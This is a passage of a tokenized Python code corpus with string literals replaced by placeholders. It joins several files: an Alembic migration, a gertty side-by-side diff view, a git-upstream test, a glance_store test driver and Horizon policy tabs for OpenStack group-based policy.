ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT:label>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:label>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . 
Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:value>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:file>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT:id>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . 
f ( '<STR_LIT>' ) , '<STR_LIT>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_table ( '<STR_LIT:message>' , <EOL> sa . Column ( '<STR_LIT:key>' , sa . Integer ( ) , nullable = False , quote = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:key>' ) <EOL> ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT:id>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT>' ] , unique = False ) <EOL> def downgrade ( ) : <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_table ( '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . 
f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:label>' ) <EOL> op . drop_table ( '<STR_LIT:label>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> import urwid <EOL> from gertty import keymap <EOL> from gertty import mywid <EOL> from gertty . view . diff import BaseDiffComment , BaseDiffCommentEdit , BaseDiffLine <EOL> from gertty . view . diff import BaseFileHeader , BaseFileReminder , BaseDiffView <EOL> LN_COL_WIDTH = <NUM_LIT:5> <EOL> class SideDiffCommentEdit ( BaseDiffCommentEdit ) : <EOL> def __init__ ( self , app , context , old_key = None , new_key = None , old = u'<STR_LIT>' , new = u'<STR_LIT>' ) : <EOL> super ( SideDiffCommentEdit , self ) . __init__ ( [ ] ) <EOL> self . app = app <EOL> self . context = context <EOL> self . old_key = old_key <EOL> self . new_key = new_key <EOL> self . old = mywid . MyEdit ( edit_text = old , multiline = True , ring = app . ring ) <EOL> self . new = mywid . MyEdit ( edit_text = new , multiline = True , ring = app . ring ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> if context . old_file_key and ( context . old_ln is not None or context . header ) : <EOL> self . contents . append ( ( urwid . AttrMap ( self . old , '<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> else : <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> if context . new_file_key and ( context . new_ln is not None or context . header ) : <EOL> self . contents . append ( ( urwid . AttrMap ( self . new , '<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> new_editable = True <EOL> else : <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> new_editable = False <EOL> if new_editable : <EOL> self . focus_position = <NUM_LIT:3> <EOL> else : <EOL> self . focus_position = <NUM_LIT:1> <EOL> def keypress ( self , size , key ) : <EOL> if not self . app . 
input_buffer : <EOL> key = super ( SideDiffCommentEdit , self ) . keypress ( size , key ) <EOL> keys = self . app . input_buffer + [ key ] <EOL> commands = self . app . config . keymap . getCommands ( keys ) <EOL> if ( ( keymap . NEXT_SELECTABLE in commands ) or <EOL> ( keymap . PREV_SELECTABLE in commands ) ) : <EOL> if ( ( self . context . old_ln is not None and <EOL> self . context . new_ln is not None ) or <EOL> self . context . header ) : <EOL> if self . focus_position == <NUM_LIT:3> : <EOL> self . focus_position = <NUM_LIT:1> <EOL> else : <EOL> self . focus_position = <NUM_LIT:3> <EOL> return None <EOL> return key <EOL> class SideDiffComment ( BaseDiffComment ) : <EOL> def __init__ ( self , context , old , new ) : <EOL> super ( SideDiffComment , self ) . __init__ ( [ ] ) <EOL> self . context = context <EOL> oldt = urwid . Text ( old ) <EOL> newt = urwid . Text ( new ) <EOL> if old : <EOL> oldt = urwid . AttrMap ( oldt , '<STR_LIT>' ) <EOL> if new : <EOL> newt = urwid . AttrMap ( newt , '<STR_LIT>' ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> self . contents . append ( ( oldt , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> self . contents . append ( ( newt , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> class SideDiffLine ( BaseDiffLine ) : <EOL> def __init__ ( self , app , context , old , new , callback = None ) : <EOL> super ( SideDiffLine , self ) . __init__ ( '<STR_LIT>' , on_press = callback ) <EOL> self . context = context <EOL> self . text_widgets = [ ] <EOL> columns = [ ] <EOL> for ( ln , action , line ) in ( old , new ) : <EOL> if ln is None : <EOL> ln = '<STR_LIT>' <EOL> else : <EOL> ln = '<STR_LIT>' % ( LN_COL_WIDTH - <NUM_LIT:1> , ln ) <EOL> ln_col = urwid . Text ( ( '<STR_LIT>' , ln ) ) <EOL> ln_col . set_wrap_mode ( '<STR_LIT>' ) <EOL> line_col = mywid . 
SearchableText ( line ) <EOL> self . text_widgets . append ( line_col ) <EOL> if action == '<STR_LIT>' : <EOL> line_col = urwid . AttrMap ( line_col , '<STR_LIT>' ) <EOL> columns += [ ( LN_COL_WIDTH , ln_col ) , line_col ] <EOL> col = urwid . Columns ( columns ) <EOL> map = { None : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . _w = urwid . AttrMap ( col , None , focus_map = map ) <EOL> def search ( self , search , attribute ) : <EOL> ret = False <EOL> for w in self . text_widgets : <EOL> if w . search ( search , attribute ) : <EOL> ret = True <EOL> return ret <EOL> class SideFileHeader ( BaseFileHeader ) : <EOL> def __init__ ( self , app , context , old , new , callback = None ) : <EOL> super ( SideFileHeader , self ) . __init__ ( '<STR_LIT>' , on_press = callback ) <EOL> self . context = context <EOL> col = urwid . Columns ( [ <EOL> urwid . Text ( ( '<STR_LIT:filename>' , old ) ) , <EOL> urwid . Text ( ( '<STR_LIT:filename>' , new ) ) ] ) <EOL> map = { None : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' } <EOL> self . _w = urwid . AttrMap ( col , None , focus_map = map ) <EOL> class SideFileReminder ( BaseFileReminder ) : <EOL> def __init__ ( self ) : <EOL> self . old_text = urwid . Text ( ( '<STR_LIT:filename>' , '<STR_LIT>' ) ) <EOL> self . new_text = urwid . Text ( ( '<STR_LIT:filename>' , '<STR_LIT>' ) ) <EOL> col = urwid . Columns ( [ self . old_text , self . new_text ] ) <EOL> super ( SideFileReminder , self ) . __init__ ( col ) <EOL> def set ( self , old , new ) : <EOL> self . old_text . set_text ( ( '<STR_LIT:filename>' , old ) ) <EOL> self . new_text . 
set_text ( ( '<STR_LIT:filename>' , new ) ) <EOL> class SideDiffView ( BaseDiffView ) : <EOL> def makeLines ( self , diff , lines_to_add , comment_lists ) : <EOL> lines = [ ] <EOL> for old , new in lines_to_add : <EOL> context = self . makeContext ( diff , old [ <NUM_LIT:0> ] , new [ <NUM_LIT:0> ] ) <EOL> lines . append ( SideDiffLine ( self . app , context , old , new , <EOL> callback = self . onSelect ) ) <EOL> key = '<STR_LIT>' % ( old [ <NUM_LIT:0> ] , diff . oldname ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( new [ <NUM_LIT:0> ] , diff . newname ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffComment ( context , old_comment , new_comment ) ) <EOL> key = '<STR_LIT>' % ( old [ <NUM_LIT:0> ] , diff . oldname ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( new [ <NUM_LIT:0> ] , diff . newname ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffCommentEdit ( self . app , context , <EOL> old_comment_key , <EOL> new_comment_key , <EOL> old_comment , new_comment ) ) <EOL> return lines <EOL> def makeFileReminder ( self ) : <EOL> return SideFileReminder ( ) <EOL> def makeFileHeader ( self , diff , comment_lists ) : <EOL> context = self . 
makeContext ( diff , None , None , header = True ) <EOL> lines = [ ] <EOL> lines . append ( SideFileHeader ( self . app , context , diff . oldname , diff . newname , <EOL> callback = self . onSelect ) ) <EOL> key = '<STR_LIT>' % ( diff . oldname , ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( diff . newname , ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffComment ( context , old_comment , new_comment ) ) <EOL> key = '<STR_LIT>' % ( diff . oldname , ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( diff . newname , ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffCommentEdit ( self . app , context , <EOL> old_comment_key , <EOL> new_comment_key , <EOL> old_comment , new_comment ) ) <EOL> return lines <EOL> def makeCommentEdit ( self , edit ) : <EOL> return SideDiffCommentEdit ( self . app , edit . context ) <EOL> def cleanupEdit ( self , edit ) : <EOL> if edit . old_key : <EOL> self . deleteComment ( edit . old_key ) <EOL> edit . old_key = None <EOL> if edit . new_key : <EOL> self . deleteComment ( edit . new_key ) <EOL> edit . new_key = None <EOL> old = edit . old . edit_text . strip ( ) <EOL> new = edit . new . edit_text . strip ( ) <EOL> if old or new : <EOL> if old : <EOL> edit . old_key = self . 
saveComment ( <EOL> edit . context , old , new = False ) <EOL> if new : <EOL> edit . new_key = self . saveComment ( <EOL> edit . context , new , new = True ) <EOL> else : <EOL> self . listbox . body . remove ( edit ) </s>
<s> import os <EOL> from pprint import pformat <EOL> from testscenarios import TestWithScenarios <EOL> from testtools . content import text_content <EOL> from git_upstream . tests . base import BaseTestCase <EOL> from git_upstream . tests . base import get_scenarios <EOL> import_command = __import__ ( "<STR_LIT>" , globals ( ) , <EOL> locals ( ) , [ '<STR_LIT>' ] , - <NUM_LIT:1> ) <EOL> LocateChangesWalk = import_command . LocateChangesWalk <EOL> class TestStrategies ( TestWithScenarios , BaseTestCase ) : <EOL> scenarios = get_scenarios ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> "<STR_LIT>" ) ) <EOL> def setUp ( self ) : <EOL> self . addDetail ( '<STR_LIT:description>' , text_content ( self . desc ) ) <EOL> super ( TestStrategies , self ) . setUp ( ) <EOL> self . addDetail ( '<STR_LIT>' , <EOL> text_content ( pformat ( <EOL> list ( ( c , self . _graph [ c ] . hexsha ) <EOL> for c in self . expected_changes ) ) ) ) <EOL> def test_search_changes ( self ) : <EOL> strategy = LocateChangesWalk ( <EOL> branch = self . branches [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> search_refs = [ self . branches [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . _commits_from_nodes ( self . expected_changes ) , <EOL> [ c for c in strategy . filtered_iter ( ) ] ) </s>
<s> from glance_store import driver <EOL> from glance_store import exceptions <EOL> class UnconfigurableStore ( driver . Store ) : <EOL> def configure ( self , re_raise_bsc = False ) : <EOL> raise exceptions . BadStoreConfiguration ( ) </s>
<s> import testtools <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" </s>
<s> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from gbpui import client <EOL> from gbpui import column_filters as gfilters <EOL> import tables <EOL> class L3PolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> l3policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> l3policy = client . l3policy_get ( request , l3policy_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : l3policy } <EOL> class L3PolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . L3PolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_l3policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . l3policy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_l3_policy_attributes ( <EOL> self . request , x ) <EOL> policies = [ update ( item ) for item in policies ] <EOL> except Exception : <EOL> policies = [ ] <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class L2PolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . L2PolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_l2policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . l2policy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> except Exception : <EOL> policies = [ ] <EOL> exceptions . handle ( self . tab_group . 
request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class ServicePolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . ServicePolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_service_policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . networkservicepolicy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_service_policy_attributes ( x ) <EOL> policies = [ update ( item ) for item in policies ] <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class ServicePolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> policy = client . get_networkservice_policy ( request , policy_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : policy } <EOL> class ExternalConnectivityTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . ExternalConnectivityTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_external_connectivity_table_data ( self ) : <EOL> external_segment_list = [ ] <EOL> try : <EOL> external_segment_list = client . externalconnectivity_list ( self . request , <EOL> self . request . user . tenant_id ) <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return external_segment_list <EOL> class ExternalConnectivityDetailsTab ( tabs . 
Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> external_connectivity_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> external_connectivity = client . get_externalconnectivity ( request , <EOL> external_connectivity_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : external_connectivity } <EOL> class NATPoolTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . NATPoolTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_nat_pool_table_data ( self ) : <EOL> nat_pool_list = [ ] <EOL> try : <EOL> nat_pools = client . natpool_list ( self . request , <EOL> self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_nat_pool_attributes ( <EOL> self . request , x ) <EOL> nat_pool_list = [ update ( nat_pool ) for nat_pool in nat_pools ] <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return nat_pool_list <EOL> class NATPoolDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> nat_pool_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> nat_pool = client . get_natpool ( request , <EOL> nat_pool_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : nat_pool } <EOL> class ServicePolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( ServicePolicyDetailsTab , ) <EOL> sticky = True <EOL> class ExternalConnectivityDetailsTabs ( tabs . 
TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( ExternalConnectivityDetailsTab , ) <EOL> sticky = True <EOL> class NATPoolDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( NATPoolDetailsTab , ) <EOL> sticky = True <EOL> class L3PolicyTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L3PolicyTab , ServicePolicyTab , ExternalConnectivityTab , NATPoolTab ) <EOL> sticky = True <EOL> class L2PolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> l2policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> l2policy = client . l2policy_get ( request , l2policy_id ) <EOL> ptgs = [ ] <EOL> for item in l2policy . policy_target_groups : <EOL> ptgs . append ( client . policy_target_get ( request , item ) ) <EOL> setattr ( l2policy , '<STR_LIT>' , ptgs ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : l2policy } <EOL> class L2PolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L2PolicyDetailsTab , ) <EOL> class L3PolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L3PolicyDetailsTab , L2PolicyTab , ) </s>
